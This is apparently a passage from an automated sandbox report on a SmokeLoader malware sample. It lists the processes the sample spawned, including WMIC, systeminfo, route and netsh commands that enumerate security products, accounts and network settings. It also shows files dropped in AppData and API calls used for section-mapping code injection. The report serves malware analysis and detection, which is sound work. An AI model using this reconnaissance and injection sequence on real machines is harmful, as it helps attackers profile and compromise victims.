Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	17:28:43
Start date:	03/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	17:28:44
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	17:28:45
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xa90000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	17:28:46
Start date:	03/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	17:28:46
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	17:28:47
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xa90000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	17:28:48
Start date:	03/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	17:28:48
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	17:28:50
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	17:28:52
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	17:28:55
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	17:28:57
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	17:28:59
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	17:29:01
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	17:29:06
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	17:29:09
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	17:29:13
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	17:29:15
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	17:29:20
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Imagebase:	0x7ff72e630000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	17:29:21
Start date:	03/10/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig /displaydns
Imagebase:	0x7ff7b0e20000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	17:29:22
Start date:	03/10/2024
Path:	C:\Windows\System32\ROUTE.EXE
Wow64 process (32bit):	false
Commandline:	route print
Imagebase:	0x7ff753ba0000
File size:	24'576 bytes
MD5 hash:	3C97E63423E527BA8381E81CBA00B8CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	17:29:24
Start date:	03/10/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh firewall show state
Imagebase:	0x7ff72c570000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	17:29:24
Start date:	03/10/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff6261b0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	17:29:29
Start date:	03/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /v /fo csv
Imagebase:	0x7ff611c30000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	17:30:01
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Roaming\dghchav
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\dghchav
Imagebase:	0x400000
File size:	397'824 bytes
MD5 hash:	119C907F0839351B214BD51034B6F124
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	17:30:01
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Roaming\eihchav
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\eihchav
Imagebase:	0x400000
File size:	396'800 bytes
MD5 hash:	5D99D66EF42EC43AF05B9304AEBEFDB6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	40.7%
Signature Coverage:	44.9%
Total number of Nodes:	118
Total number of Limit Nodes:	4

Executed Functions

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 00621706 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0062172E
Module32First.KERNEL32(00000000,00000224), ref: 0062174E

Memory Dump Source

Source File: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0060F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60f000_9VgIkx4su0.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 0e14d6e04ef9909f5c947dfc742519d00e64aa9065b34efef07b025033945e67
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: DCF06236200B246BD7203BF5A88DBAA76E9AF9A765F100528F642955C0DA70E8454E61

Function 0209003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0209024D

Strings

kernel32.dll, xrefs: 0209008F, 02090095
cess, xrefs: 0209018D

Memory Dump Source

Source File: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2090000_9VgIkx4su0.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 571f571e7d084fd000c4ea48e79ccf4338d86c462d87e49f6c0699987f3fdcf7
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: D4526A74A01229DFDBA4CF58C984BADBBB1BF09314F1480D9E54EAB351DB30AA85DF14

Function 02090E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02090223,?,?), ref: 02090E19
SetErrorMode.KERNELBASE(00000000,?,?,02090223,?,?), ref: 02090E1E

Memory Dump Source

Source File: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2090000_9VgIkx4su0.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 10129a3fe212e682639f71971b88a6d26267ce46d9308158a6e3ab39f2dfc045
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 5DD0123514522877DB412A94DC09BCD7B5DDF05B66F008011FB0DD9080C770954046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

